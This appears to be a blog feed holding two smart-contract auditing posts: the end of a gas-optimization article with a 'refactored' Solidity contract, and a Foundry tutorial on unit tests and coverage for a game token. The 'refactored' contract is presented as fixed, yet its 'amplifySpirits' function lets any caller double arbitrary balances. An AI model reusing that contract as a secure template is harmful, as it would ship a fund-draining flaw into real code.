Events are great for off-chain indexing and logging, but they don’t modify on-chain state. If you’re using events as a way to track something critical (e.g., who has invoked a spell), that logic should **live on-chain**, not only in emitted logs.

Relying solely on events for logic validation can lead to inconsistencies, especially if a function fails after the event is emitted.

Use events for transparency and analytics—not as a source of truth.

## Consider Using unchecked for Safe Math in Trusted Contexts

Since Solidity 0.8.0, arithmetic operations include overflow checks by default. While this improves safety, it adds gas overhead. In trusted internal logic (e.g., `for` loop counters), you can use `unchecked` blocks to save gas safely.

```solidity
for (uint256 i = 0; i &lt; n; ) {
    // do stuff

    unchecked {
        i++;
    }
}

```

It avoids unnecessary checks in contexts where overflow is not a concern (e.g., incrementing a loop index up to a known bound).

# Final Refactored Contract

Below you can see how the previously vulnerable contract looks once optimized to reduce gas consumption and eliminate the issues discussed earlier.

&lt;details&gt;
&lt;summary&gt;Refactored Contract&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

contract GrimoireOfEchoes {
    mapping(address =&gt; uint256) public manaReservoir;
    uint256 public corruptionIndex;
    address public immutable oracle;
    uint256 public constant FORBIDDEN_TITHE = 100;

    error NoEssenceBound();
    error RitualDisrupted();
    error OnlyContractsMayInvoke();

    event SpellBackfired(address target, bytes incantation);

    constructor(address _oracle) {
        oracle = _oracle;
    }

    function channelMana() external payable {
        manaReservoir[msg.sender] += msg.value;
    }

    function withdrawEssence() external {
        uint256 essence = manaReservoir[msg.sender];
        if (essence == 0) revert NoEssenceBound();

        manaReservoir[msg.sender] = 0;

        (bool success, ) = payable(msg.sender).call{value: essence}(&quot;&quot;);
        if (!success) revert RitualDisrupted();
    }

    function amplifySpirits(address[] calldata spirits) external {
        uint256 len = spirits.length;
        for (uint256 i = 0; i &lt; len;) {
            manaReservoir[spirits[i]] = manaReservoir[spirits[i]] * 2;
            unchecked { i++; }
        }
    }

    function invokeOracle() external {
        if (msg.sender == tx.origin) revert OnlyContractsMayInvoke();

        (bool success, ) = oracle.call(
            abi.encodeWithSignature(&quot;recordInvocation()&quot;)
        );

        if (success) {
            unchecked { corruptionIndex += 1; }
        } else {
            emit SpellBackfired(oracle, abi.encodeWithSignature(&quot;recordInvocation()&quot;));
        }
    }
}

contract OracleOfWhispers {
    mapping(address =&gt; bool) public invoked;
    event InvocationRecorded(address caller);

    error AlreadyInvoked();

    function recordInvocation() external {
        if (invoked[msg.sender]) revert AlreadyInvoked();

        invoked[msg.sender] = true;
        emit InvocationRecorded(msg.sender);
    }
}

```
&lt;/details&gt;


-   **Switched to pull-based ETH withdrawal (`withdrawEssence`)**  
    The original design pushed ETH with only a 2300-gas stipend (the `transfer`/`send` pattern), which is risky for contract receivers. We now use a pull pattern: users call `withdrawEssence()` themselves, and gas forwarding is not artificially restricted.
-   **Replaced state variables with `constant` and `immutable`**  
    `FORBIDDEN_TITHE` is now `constant`, reducing storage costs. `oracle` is now `immutable`, since it’s only set once in the constructor.
-   **Introduced custom errors for cheaper and cleaner reverts**  
    Instead of using string-based `require()`, we defined custom errors. This lowers gas usage and improves clarity when reading the code.
-   **Deferred state change after external call (`invokeOracle`)**  
    We moved the increment of `corruptionIndex` to only occur **after** verifying that the call to the oracle succeeded—preventing silent state corruption.
-   **Loop optimizations in `amplifySpirits()`**  
    Cached the array length in a local variable to save gas. Used `unchecked` for the loop index increment, since overflow is not possible within a bounded loop.
-   **Function naming made more expressive (`withdrawEssence`)**  
    The previous name `releaseEssence` implied a push-based model. `withdrawEssence` better reflects the new pull-based pattern.
-   **Failure logging (`SpellBackfired` event)**  
    If the oracle call fails, we emit an event to make it observable off-chain, which aids in debugging and monitoring.

# Conclusions

Gas is more than just a fee—it’s a constraint that directly impacts how contracts behave, scale, and fail.

Throughout this article, we’ve looked at how poor gas management can lead to silent logic corruption, blocked withdrawals, and denial-of-service risks. But we’ve also seen how thoughtful design choices—like switching to pull-based transfers, bounding loops, and using efficient patterns—can prevent these issues entirely.

When auditing smart contracts, spotting vulnerabilities is only half the job. The real value comes from understanding **why** they happen and how to **reshape the code** to make it safer and more efficient.

Use gas reports to validate your assumptions, study how code behaves under pressure, and don&apos;t just look for exploits—look for opportunities to improve.

Smart contracts are, in the end, systems running under strict limits. And a well-audited system isn’t just secure—it’s built to _endure_.</content:encoded><author>Ruben Santos</author></item><item><title>Strengthening Smart Contracts: Unit Testing, Fuzzing, and Invariant Testing with Foundry</title><link>https://www.kayssel.com/post/web3-15</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-15</guid><description>We explore unit testing, fuzzing, and invariant testing in smart contracts to detect vulnerabilities and enhance security before deployment, using Foundry for automated and effective testing.</description><pubDate>Sun, 16 Mar 2025 11:35:11 GMT</pubDate><content:encoded>Over the past few weeks, I’ve been exploring different testing methodologies for smart contracts, and in this chapter, we’ll go through three key techniques to ensure contract reliability and security:

-   **Unit Testing** – Verifies that individual functions return expected results under controlled conditions.
-   **Fuzzing** – Generates random, extreme, or unexpected inputs to uncover vulnerabilities.
-   **Invariant Testing** – Ensures that fundamental rules (such as token supply consistency) always hold, regardless of transaction order or volume.

Testing is the process of verifying that a program behaves as expected across different scenarios. In smart contracts, this is especially important since once deployed, contracts cannot be modified, meaning that any bug or exploit could lead to financial loss, security breaches, or permanently locked funds. Good testing goes beyond checking if a function returns the right value; it also considers edge cases, unexpected inputs, and adversarial conditions to identify potential failures before they reach production.

We’ll work through various examples to demonstrate how each of these techniques can help detect and prevent issues before deployment. For today’s chapter, we’ll focus exclusively on Foundry with its basic configuration, though Foundry provides a wide range of advanced testing options that we’ll explore in future chapters.

By the end of this chapter, you’ll have a solid understanding of how these testing techniques apply to smart contracts, with practical examples of how they help identify and fix vulnerabilities before deployment.

Let’s dive in!

# DesertCoin Smart Contract

Now that we understand what testing is and why it’s crucial, let’s look at an example using a modified version of the smart contract we built in the previous article. This time, our ERC20 token will serve as an in-game currency, allowing players to buy items, trade with other users, and even stake their tokens for rewards.

&lt;details&gt;
&lt;summary&gt;DesertCoin&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import &quot;@openzeppelin/contracts/token/ERC20/ERC20.sol&quot;;
import &quot;@openzeppelin/contracts/access/Ownable.sol&quot;;
import &quot;@openzeppelin/contracts/utils/Pausable.sol&quot;;

contract DesertCoin is ERC20, Ownable, Pausable {
    uint256 public faucetAmount = 1000 * (10 ** decimals());
    mapping(address =&gt; uint256) public lastFaucetClaim;
    mapping(uint256 =&gt; uint256) public itemPrices;
    mapping(address =&gt; mapping(uint256 =&gt; bool)) public purchasedItems;
    mapping(address =&gt; uint256) public stakedBalance;

    event ItemPurchased(address indexed buyer, uint256 indexed itemId);
    event ItemPriceSet(uint256 indexed itemId, uint256 price);
    event TokensStaked(address indexed user, uint256 amount);
    event TokensUnstaked(address indexed user, uint256 amount);

    constructor(uint256 initialSupply) ERC20(&quot;DesertCoin&quot;, &quot;DSC&quot;) Ownable(msg.sender) {
        _mint(msg.sender, initialSupply);
    }

    /**  Faucet to receive tokens */
    function claimFaucet() public {
        require(block.timestamp &gt;= lastFaucetClaim[msg.sender] + 1 days, &quot;Wait 24h to claim again&quot;);
        _mint(msg.sender, faucetAmount);
        lastFaucetClaim[msg.sender] = block.timestamp;
    }

    /**  Set price for an in-game item (Only Owner) */
    function setItemPrice(uint256 itemId, uint256 price) public onlyOwner {
        require(price &gt; 0, &quot;Price must be greater than zero&quot;);
        itemPrices[itemId] = price;
        emit ItemPriceSet(itemId, price);
    }

    /**  Buy game items */
    function buyItem(uint256 itemId) public {
        require(itemPrices[itemId] &gt; 0, &quot;Item not for sale&quot;);
        require(balanceOf(msg.sender) &gt;= itemPrices[itemId], &quot;Not enough DSC&quot;);

        _burn(msg.sender, itemPrices[itemId]);
        purchasedItems[msg.sender][itemId] = true;
        emit ItemPurchased(msg.sender, itemId);
    }

    /**  Trade tokens with another player */
    function trade(address to, uint256 amount) public {
        require(balanceOf(msg.sender) &gt;= amount, &quot;Insufficient balance&quot;);
        require(to != address(0), &quot;Invalid address&quot;);

        _transfer(msg.sender, to, amount);
    }

    /**  Block the tokens for staking */
    function stake(uint256 amount) public {
        require(balanceOf(msg.sender) &gt;= amount, &quot;Insufficient DSC&quot;);

        _burn(msg.sender, amount);
        stakedBalance[msg.sender] += amount;
        emit TokensStaked(msg.sender, amount);
    }

    function unstake(uint256 amount) public {
        require(stakedBalance[msg.sender] &gt;= amount, &quot;Not enough staked&quot;);

        _mint(msg.sender, amount);
        stakedBalance[msg.sender] -= amount;
        emit TokensUnstaked(msg.sender, amount);
    }

    /** Pause the contract */
    function pause() public onlyOwner {
        _pause();
    }

    function unpause() public onlyOwner {
        _unpause();
    }

    /**  Prevent transfers when paused */
    function _update(address from, address to, uint256 amount) internal virtual override {
        require(!paused(), &quot;ERC20Pausable: token transfer while paused&quot;);
        super._update(from, to, amount);
    }
}

```
&lt;/details&gt;


At the core of the contract, we inherit from OpenZeppelin’s **ERC20**, **Ownable**, and **Pausable** contracts:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import &quot;@openzeppelin/contracts/token/ERC20/ERC20.sol&quot;;
import &quot;@openzeppelin/contracts/access/Ownable.sol&quot;;
import &quot;@openzeppelin/contracts/utils/Pausable.sol&quot;;

```

This not only simplifies the implementation but also ensures that our token follows the ERC20 standard, includes ownership-based restrictions, and provides a built-in security mechanism that allows us to pause operations if needed.

To manage different aspects of the game, the contract includes several **global variables**:

```solidity
uint256 public faucetAmount = 1000 * (10 ** decimals());
mapping(address =&gt; uint256) public lastFaucetClaim;
mapping(uint256 =&gt; uint256) public itemPrices;
mapping(address =&gt; mapping(uint256 =&gt; bool)) public purchasedItems;
mapping(address =&gt; uint256) public stakedBalance;

```

These variables help track faucet claims (ensuring users can only claim tokens once per day), store item prices, register which items have been purchased by each player, and maintain a record of staked balances.

We also define key **events** to log important actions, such as when an item is purchased, a new item price is set, or tokens are staked or unstaked:

```solidity
    event ItemPurchased(address indexed buyer, uint256 indexed itemId);
    event ItemPriceSet(uint256 indexed itemId, uint256 price);
    event TokensStaked(address indexed user, uint256 amount);
    event TokensUnstaked(address indexed user, uint256 amount);

```

These events play a crucial role in tracking blockchain activity, as they allow external applications and users to monitor contract interactions.

The **constructor** initializes the token’s name, symbol, and initial supply while assigning ownership:

```solidity
constructor(uint256 initialSupply) ERC20(&quot;DesertCoin&quot;, &quot;DSC&quot;) Ownable(msg.sender) {
    _mint(msg.sender, initialSupply);
}

```

From here, we introduce several key functions. The first is `claimFaucet`, which allows users to receive free tokens every 24 hours:

```solidity
    /**  Faucet to receive tokens */
    function claimFaucet() public {
        require(block.timestamp &gt;= lastFaucetClaim[msg.sender] + 1 days, &quot;Wait 24h to claim again&quot;);
        _mint(msg.sender, faucetAmount);
        lastFaucetClaim[msg.sender] = block.timestamp;
    }

```

This ensures that players can periodically receive small amounts of **DesertCoin** without draining the total supply.

Next, we have a function that lets the **owner** set the price of in-game items. This prevents unauthorized modifications that could disrupt the economy:

```solidity
/**  Set price for an in-game item (Only Owner) */
function setItemPrice(uint256 itemId, uint256 price) public onlyOwner {
    require(price &gt; 0, &quot;Price must be greater than zero&quot;);
    itemPrices[itemId] = price;
    emit ItemPriceSet(itemId, price);
}

```

The `buyItem` function allows players to **purchase in-game items** using **DSC tokens**. When an item is bought, the corresponding amount of tokens is burned from the buyer’s balance, and the purchase is registered:

```solidity
    /**  Buy game items */
    function buyItem(uint256 itemId) public {
        require(itemPrices[itemId] &gt; 0, &quot;Item not for sale&quot;);
        require(balanceOf(msg.sender) &gt;= itemPrices[itemId], &quot;Not enough DSC&quot;);

        _burn(msg.sender, itemPrices[itemId]);
        purchasedItems[msg.sender][itemId] = true;
        emit ItemPurchased(msg.sender, itemId);
    }


```

We also introduce a **trading mechanism** that allows players to transfer tokens among themselves:

```solidity
function trade(address to, uint256 amount) public {
    require(balanceOf(msg.sender) &gt;= amount, &quot;Insufficient balance&quot;);
    require(to != address(0), &quot;Invalid address&quot;);

    _transfer(msg.sender, to, amount);
}

```

Next, we implement a **staking system** where players can stake their tokens. Staked tokens are burned, and the balance is recorded:

```solidity
/**  Block the tokens for staking */
function stake(uint256 amount) public {
    require(balanceOf(msg.sender) &gt;= amount, &quot;Insufficient DSC&quot;);

    _burn(msg.sender, amount);
    stakedBalance[msg.sender] += amount;
    emit TokensStaked(msg.sender, amount);
}

```

Users can **unstake** their tokens at any time, which mints them back into circulation:

```solidity

    function unstake(uint256 amount) public {
        require(stakedBalance[msg.sender] &gt;= amount, &quot;Not enough staked&quot;);

        _mint(msg.sender, amount);
        stakedBalance[msg.sender] -= amount;
        emit TokensUnstaked(msg.sender, amount);
    }

```

For **security reasons**, we also introduce **pause and unpause functions**, allowing the contract owner to disable transfers and other interactions in case of emergency:

```solidity
    /** Pause the contract */
    function pause() public onlyOwner {
        _pause();
    }

    function unpause() public onlyOwner {
        _unpause();
    }

```

Finally, we override the `_update` function to prevent token transfers when the contract is paused:

```solidity
/**  Prevent transfers when paused */
function _update(address from, address to, uint256 amount) internal virtual override {
    require(!paused(), &quot;ERC20Pausable: token transfer while paused&quot;);
    super._update(from, to, amount);
}

```

# Verifying Core Functionality with Unit Tests

In previous articles, we’ve explored how to use **Foundry** for testing, emulating exploits, and simulating different attack scenarios. By now, you should be comfortable with writing and running tests in Foundry, but today, we’re shifting our focus to **unit testing**—a fundamental part of any **smart contract audit**.

When auditing a project, developers typically provide a **suite of unit tests** alongside the smart contract. These tests serve as the first line of defense against bugs and logic errors, ensuring that the contract behaves as expected under normal conditions. However, as auditors, we can’t just rely on the tests they provide. Unit tests are usually written to confirm that functions return the correct values, but they don’t always explore edge cases, adversarial conditions, or the unintended ways a contract could break. That’s where **fuzzing and invariant testing** come in—but we’ll get to those later.

&lt;details&gt;
&lt;summary&gt;Unit Testing of DesertCoin&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import &quot;forge-std/Test.sol&quot;;
import &quot;../src/DesertCoin.sol&quot;;

contract DesertCoinTest is Test {
    DesertCoin desertCoin;
    address owner = address(1);
    address user1 = address(2);
    address user2 = address(3);

    uint256 initialSupply = 1_000_000 ether;

    function setUp() public {
        vm.startPrank(owner); // Set the owner for testing
        desertCoin = new DesertCoin(initialSupply);
        desertCoin.transfer(user1, 1000 ether); // Give some tokens to user1
        vm.stopPrank();
    }

    /**  1. Faucet */
    function testClaimFaucet() public {
        vm.warp(block.timestamp + 1 days); // Simulate 24h passing

        vm.prank(user1);
        desertCoin.claimFaucet();

        assertEq(
            desertCoin.balanceOf(user1),
            1000 ether + desertCoin.faucetAmount()
        );
    }

    function testFailClaimFaucetTwice() public {
        vm.warp(block.timestamp + 1 days); // Let the first claim succeed so the cooldown itself is tested
        vm.prank(user1);
        desertCoin.claimFaucet();

        vm.prank(user1);
        desertCoin.claimFaucet(); // Should fail because only once every 24h
    }

    /**  2. Marketplace */
    function testSetItemPrice() public {
        vm.prank(owner);
        desertCoin.setItemPrice(1, 500 ether);

        assertEq(desertCoin.itemPrices(1), 500 ether);
    }

    function testFailSetItemPriceByNonOwner() public {
        vm.prank(user1);
        desertCoin.setItemPrice(1, 500 ether); // Should fail since user1 is not the owner
    }

    function testBuyItem() public {
        vm.prank(owner);
        desertCoin.setItemPrice(1, 500 ether);

        vm.prank(user1);
        desertCoin.buyItem(1);

        assertTrue(desertCoin.purchasedItems(user1, 1));
        assertEq(desertCoin.balanceOf(user1), 500 ether);
    }

    function testFailBuyItemInsufficientFunds() public {
        vm.prank(owner);
        desertCoin.setItemPrice(1, 2000 ether); // More than user&apos;s balance

        vm.prank(user1);
        desertCoin.buyItem(1); // Should fail
    }

    /**  3. Transfers */
    function testTrade() public {
        vm.prank(user1);
        desertCoin.trade(user2, 500 ether);

        assertEq(desertCoin.balanceOf(user1), 500 ether);
        assertEq(desertCoin.balanceOf(user2), 500 ether);
    }

    function testFailTradeInsufficientBalance() public {
        vm.prank(user1);
        desertCoin.trade(user2, 2000 ether); // Should fail (not enough balance)
    }

    function testFailTradeWhilePaused() public {
        vm.prank(owner);
        desertCoin.pause();

        vm.prank(user1);
        desertCoin.trade(user2, 100 ether); // Should fail due to pause
    }

    function testTradeAfterUnpause() public {
        vm.prank(owner);
        desertCoin.pause();

        vm.prank(owner);
        desertCoin.unpause();

        vm.prank(user1);
        desertCoin.trade(user2, 100 ether); // Should succeed
    }

    /** 4. Staking */
    function testStake() public {
        vm.prank(user1);
        desertCoin.stake(500 ether);

        assertEq(desertCoin.stakedBalance(user1), 500 ether);
        assertEq(desertCoin.balanceOf(user1), 500 ether);
    }

    function testFailStakeInsufficientFunds() public {
        vm.prank(user1);
        desertCoin.stake(2000 ether); // Should fail
    }

    function testUnstake() public {
        vm.prank(user1);
        desertCoin.stake(500 ether);

        vm.prank(user1);
        desertCoin.unstake(500 ether);

        assertEq(desertCoin.stakedBalance(user1), 0);
        assertEq(desertCoin.balanceOf(user1), 1000 ether);
    }

    function testFailUnstakeMoreThanStaked() public {
        vm.prank(user1);
        desertCoin.stake(500 ether);

        vm.prank(user1);
        desertCoin.unstake(1000 ether); // Should fail
    }

    /** 5. Pausing */
    function testPauseAndUnpause() public {
        vm.prank(owner);
        desertCoin.pause();

        vm.prank(owner);
        vm.expectRevert(&quot;ERC20Pausable: token transfer while paused&quot;);
        desertCoin.transfer(user1, 100 ether); // Should fail

        vm.prank(owner);
        desertCoin.unpause();

        vm.prank(owner);
        desertCoin.transfer(user1, 100 ether); // Should succeed
    }
}

```
&lt;/details&gt;


For now, let’s analyze a **unit test suite** for **DesertCoin**, written in **Foundry**. This will help us understand what developers typically test, what gaps might exist, and how we can extend our testing methodology beyond the basics.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import &quot;forge-std/Test.sol&quot;;
import &quot;../src/DesertCoin.sol&quot;;

contract DesertCoinTest is Test {
    DesertCoin desertCoin;
    address owner = address(1);
    address user1 = address(2);
    address user2 = address(3);

    uint256 initialSupply = 1_000_000 ether;

    function setUp() public {
        vm.startPrank(owner);
        desertCoin = new DesertCoin(initialSupply);
        desertCoin.transfer(user1, 1000 ether);
        vm.stopPrank();
    }

```

The `setUp` function is executed before each test, ensuring a clean and predictable environment. It **deploys the contract**, assigns **initial tokens** to `user1`, and sets `owner` as the privileged address. This setup mirrors the kind of **controlled conditions** developers use when writing unit tests—they aim to verify that the contract performs as expected under normal circumstances.

### **Testing the Faucet System**

One of the first things tested is the **faucet function**, which allows users to claim tokens every 24 hours.

```solidity
function testClaimFaucet() public {
    vm.warp(block.timestamp + 1 days);

    vm.prank(user1);
    desertCoin.claimFaucet();

    assertEq(desertCoin.balanceOf(user1), 1000 ether + desertCoin.faucetAmount());
}

```

Here, `vm.warp` is used to simulate time passing, ensuring that the user can successfully claim tokens after the cooldown period. A common mistake in contracts with time-based restrictions is failing to properly enforce delays, so verifying this behavior is crucial.

The following test checks that users can’t claim the faucet reward twice within 24 hours:

```solidity
function testFailClaimFaucetTwice() public {
    vm.warp(block.timestamp + 1 days); // Let the first claim succeed so the cooldown itself is tested
    vm.prank(user1);
    desertCoin.claimFaucet();

    vm.prank(user1);
    desertCoin.claimFaucet(); // Should fail
}

```

This confirms that the cooldown period is correctly enforced, preventing users from draining the faucet balance.

### **Testing the Marketplace**

The next set of tests focuses on the **marketplace functionality**, ensuring that only the **contract owner** can set item prices:

```solidity
function testSetItemPrice() public {
    vm.prank(owner);
    desertCoin.setItemPrice(1, 500 ether);

    assertEq(desertCoin.itemPrices(1), 500 ether);
}

```

If a regular user attempts to set an item price, the transaction should **fail**:

```solidity
function testFailSetItemPriceByNonOwner() public {
    vm.prank(user1);
    desertCoin.setItemPrice(1, 500 ether); // Should fail
}

```

Once prices are set, users should be able to purchase items:

```solidity
function testBuyItem() public {
    vm.prank(owner);
    desertCoin.setItemPrice(1, 500 ether);

    vm.prank(user1);
    desertCoin.buyItem(1);

    assertTrue(desertCoin.purchasedItems(user1, 1));
    assertEq(desertCoin.balanceOf(user1), 500 ether);
}

```

However, **buying an item without enough balance** should not be possible:

```solidity
function testFailBuyItemInsufficientFunds() public {
    vm.prank(owner);
    desertCoin.setItemPrice(1, 2000 ether);

    vm.prank(user1);
    desertCoin.buyItem(1); // Should fail
}

```

### **Testing Transfers**

The `trade` function in **DesertCoin** allows users to transfer tokens to one another. This is a basic ERC20 feature, but since we’ve modified the contract to include staking, pausing, and other mechanisms, it’s important to verify that transfers function correctly in all conditions.

First, let’s check that a valid transfer between two users works as expected:

```solidity
function testTrade() public {
    vm.prank(user1);
    desertCoin.trade(user2, 500 ether);

    assertEq(desertCoin.balanceOf(user1), 500 ether);
    assertEq(desertCoin.balanceOf(user2), 500 ether);
}

```

This confirms that `user1` can successfully send 500 DSC tokens to `user2`, reducing `user1`’s balance and increasing `user2`’s accordingly.

However, if a user attempts to transfer more tokens than they own, the transaction should fail:

```solidity
function testFailTradeInsufficientBalance() public {
    vm.prank(user1);
    desertCoin.trade(user2, 2000 ether); // Should fail (not enough balance)
}

```

This ensures that balance checks are enforced, preventing users from sending tokens they don’t have.

One crucial edge case to test is how the pause function affects transfers. Since DesertCoin implements `Pausable`, we need to verify that transactions are blocked when the contract is paused:

```solidity
function testFailTradeWhilePaused() public {
    vm.prank(owner);
    desertCoin.pause();

    vm.prank(user1);
    desertCoin.trade(user2, 100 ether); // Should fail due to pause
}

```

Finally, we check that after unpausing, transfers resume as expected:

```solidity
function testTradeAfterUnpause() public {
    vm.prank(owner);
    desertCoin.pause();
    
    vm.prank(owner);
    desertCoin.unpause();

    vm.prank(user1);
    desertCoin.trade(user2, 100 ether); // Should succeed
}

```

### **Testing Staking and Unstaking**

Next, we have staking and unstaking, where users can lock up tokens in the contract.

```solidity
function testStake() public {
    vm.prank(user1);
    desertCoin.stake(500 ether);

    assertEq(desertCoin.stakedBalance(user1), 500 ether);
    assertEq(desertCoin.balanceOf(user1), 500 ether);
}

```

This verifies that staked tokens are deducted from the user’s balance and correctly reflected in the `stakedBalance` mapping.

If a user tries to stake more tokens than they have, the function should revert:

```solidity
function testFailStakeInsufficientFunds() public {
    vm.prank(user1);
    desertCoin.stake(2000 ether); // Should fail
}

```

Unstaking should restore the user’s balance:

```solidity
function testUnstake() public {
    vm.prank(user1);
    desertCoin.stake(500 ether);

    vm.prank(user1);
    desertCoin.unstake(500 ether);

    assertEq(desertCoin.stakedBalance(user1), 0);
    assertEq(desertCoin.balanceOf(user1), 1000 ether);
}

```

If a user tries to unstake more than they have, the function should fail:

```solidity
function testFailUnstakeMoreThanStaked() public {
    vm.prank(user1);
    desertCoin.stake(500 ether);

    vm.prank(user1);
    desertCoin.unstake(1000 ether); // Should fail
}

```

### **Testing the Pause Mechanism**

Finally, we test the pause and unpause functions, ensuring that transfers are blocked while paused.

```solidity
function testPauseAndUnpause() public {
    vm.prank(owner);
    desertCoin.pause();

    vm.prank(owner);
    vm.expectRevert(&quot;ERC20Pausable: token transfer while paused&quot;);
    desertCoin.transfer(user1, 100 ether); // Should fail

    vm.prank(owner);
    desertCoin.unpause();

    vm.prank(owner);
    desertCoin.transfer(user1, 100 ether); // Should succeed
}

```

This test ensures that the pause mechanism works as intended, preventing transfers while active and resuming them once disabled.

### **Running the Tests with Foundry**

Once our test suite is written, we can run it using Foundry’s `forge test` command. Running these tests is a crucial step in auditing a smart contract, as it allows us to quickly verify that all unit tests pass before diving into more advanced testing techniques like fuzzing and invariant testing.

To execute the tests for DesertCoin, navigate to the root directory of your project and run:

```bash
forge test
```

Upon execution, Foundry will compile the contracts, run all the test cases, and display a summary of the results. Here’s an example output:

```text
[⠒] Compiling...
[⠊] Compiling 2 files with Solc 0.8.28
[⠒] Solc 0.8.28 finished in 776.29ms
Compiler run successful!

Ran 15 tests for test/DesertCoin.t.sol:DesertCoinTest
[PASS] testBuyItem() (gas: 80049)
[PASS] testClaimFaucet() (gas: 52558)
[PASS] testFailBuyItemInsufficientFunds() (gas: 42315)
[PASS] testFailClaimFaucetTwice() (gas: 12881)
[PASS] testFailSetItemPriceByNonOwner() (gas: 12763)
[PASS] testFailStakeInsufficientFunds() (gas: 12835)
[PASS] testFailTradeInsufficientBalance() (gas: 15086)
[PASS] testFailTradeWhilePaused() (gas: 25084)
[PASS] testFailUnstakeMoreThanStaked() (gas: 50519)
[PASS] testPauseAndUnpause() (gas: 36459)
[PASS] testSetItemPrice() (gas: 37767)
[PASS] testStake() (gas: 52111)
[PASS] testTrade() (gas: 48063)
[PASS] testTradeAfterUnpause() (gas: 52444)
[PASS] testUnstake() (gas: 42420)
Suite result: ok. 15 passed; 0 failed; 0 skipped; finished in 1.20ms (1.43ms CPU time)

Ran 1 test suite in 5.71ms (1.20ms CPU time): 15 tests passed, 0 failed, 0 skipped (15 total tests)

```

Each line in the output provides valuable insights:

-   `[PASS]` indicates a **successful** test.
-   The **gas usage** for each function is displayed, which is useful for optimizing contract efficiency.
-   The summary at the end confirms that **all tests passed, none failed, and none were skipped**.
-   The execution time is also displayed, showing how quickly the tests ran.
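
When a test fails or you want more detail, the Foundry CLI has filtering and verbosity flags that narrow the run to the case you care about. A short sketch (the test and file names here match the DesertCoin suite above; adjust them to your project):

```bash
# Re-run a single test with full traces (-vvv shows revert reasons and call traces)
forge test --match-test testStake -vvv

# Run only the tests in one file
forge test --match-path test/DesertCoin.t.sol

# Print a per-function gas report alongside the results
forge test --gas-report
```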

## How to Identify and Address Untested Code

When auditing a smart contract, one of the key challenges is identifying unverified or weakly tested parts of the code. Even if developers provide a suite of unit tests, they often focus on expected behaviors rather than edge cases or adversarial conditions. This means that vulnerabilities could exist in functions that haven&apos;t been thoroughly tested.

To help detect these gaps, Foundry provides the `forge coverage` command. This tool generates a code coverage report, showing which parts of the contract have been executed during testing and which haven&apos;t. The untested sections are potential risk areas, as they might contain logic flaws or vulnerabilities that were never examined under real test conditions.

To illustrate this, let’s take an example: What happens if we comment out the test cases for `trade()`?

```solidity
    /** 🔄 3. Transfers */
    //function testTrade() public {
    //    vm.prank(user1);
    //    desertCoin.trade(user2, 500 ether);

    //    assertEq(desertCoin.balanceOf(user1), 500 ether);
    //    assertEq(desertCoin.balanceOf(user2), 500 ether);
    //}

    //function testFailTradeInsufficientBalance() public {
    //    vm.prank(user1);
    //    desertCoin.trade(user2, 2000 ether); // Should fail (not enough balance)
    //}

    //function testFailTradeWhilePaused() public {
    //    vm.prank(owner);
    //    desertCoin.pause();

    //    vm.prank(user1);
    //    desertCoin.trade(user2, 100 ether); // Should fail due to pause
    //}

    //function testTradeAfterUnpause() public {
    //    vm.prank(owner);
    //    desertCoin.pause();

    //    vm.prank(owner);
    //    desertCoin.unpause();

    //    vm.prank(user1);
    //    desertCoin.trade(user2, 100 ether); // Should succeed
    //}

```

To analyze test coverage for DesertCoin, we can run:

```bash
$ forge coverage --match-path test/DesertCoin.t.sol --report lcov
[⠊] Compiling...
[⠃] Compiling 30 files with Solc 0.8.28
[⠒] Solc 0.8.28 finished in 1.82s
Compiler run successful with warnings:
[...]

Ran 11 tests for test/DesertCoin.t.sol:DesertCoinTest
[PASS] testBuyItem() (gas: 84531)
[PASS] testClaimFaucet() (gas: 54709)
[PASS] testFailBuyItemInsufficientFunds() (gas: 44471)
[PASS] testFailClaimFaucetTwice() (gas: 13321)
[PASS] testFailSetItemPriceByNonOwner() (gas: 14118)
[PASS] testFailStakeInsufficientFunds() (gas: 13740)
[PASS] testFailUnstakeMoreThanStaked() (gas: 52636)
[PASS] testPauseAndUnpause() (gas: 40735)
[PASS] testSetItemPrice() (gas: 40053)
[PASS] testStake() (gas: 55208)
[PASS] testUnstake() (gas: 45871)
Suite result: ok. 11 passed; 0 failed; 0 skipped; finished in 41.54ms (4.39ms CPU time)

```

This confirms that all tests passed, but it doesn’t tell us which parts of the contract were left untested. To visualize the coverage details, we generate an HTML report:

```bash
$ genhtml --rc derive_function_end_line=0 -o coverage-report lcov.info
Found 1 entries.
Found common filename prefix &quot;/home/rsgbengi/Projects/web3/FuzzTesting&quot;
Generating output.
Processing file src/DesertCoin.sol
  lines=27 hit=24 functions=10 hit=9
Overall coverage rate:
  lines......: 88.9% (24 of 27 lines)
  functions......: 90.0% (9 of 10 functions)

```

Examining the LCOV report, we see that most of the contract is covered, except for the trade function.

![](/content/images/2025/03/image.png)

![](/content/images/2025/03/image-1.png)

Since we commented out the trade tests, this function was never executed during testing. The red-highlighted lines in the LCOV report confirm this.

This is a **major red flag** because:

1.  **Balance validation wasn’t tested** – What if `_transfer()` is incorrectly handling balances?
2.  **Zero-address transfers weren’t checked** – Could this be exploited to send tokens to an invalid destination?
3.  **Pause functionality might not be enforced** – Does `trade()` still execute if the contract is paused?

If this function contained a security flaw, it would have gone unnoticed because no test ever triggered it.

# **Advanced Testing: Pushing Smart Contracts Beyond Unit Tests**

Up to this point, we’ve focused on unit testing, which developers typically provide when delivering a smart contract for audit. These tests ensure that basic functionality works as expected, but they don’t tell us how the contract behaves under unpredictable conditions, adversarial inputs, or complex interactions over time. This is where fuzzing and invariant testing come in.

Unlike unit tests, these advanced techniques aren’t usually included in the initial test suite. As auditors, it’s up to us to implement them ourselves or have a prepared set of cases to quickly assess vulnerabilities depending on the contract we’re analyzing. By incorporating these methods into our workflow, we can uncover issues that traditional tests might miss.

## **Thinking Like an Attacker: Brainstorming Potential Threats**

Before jumping into fuzzing and invariant testing, it’s important to take a step back and think about the contract from an attacker&apos;s perspective. Instead of just verifying that functions return expected outputs, we should ask ourselves:

-   What are the most critical functions in this contract?
-   How could an attacker break them?
-   Are there any unintended behaviors if we pass extreme or malformed inputs?
-   Could race conditions, reentrancy, or gas manipulation cause issues?
-   What happens if multiple users interact at the same time?

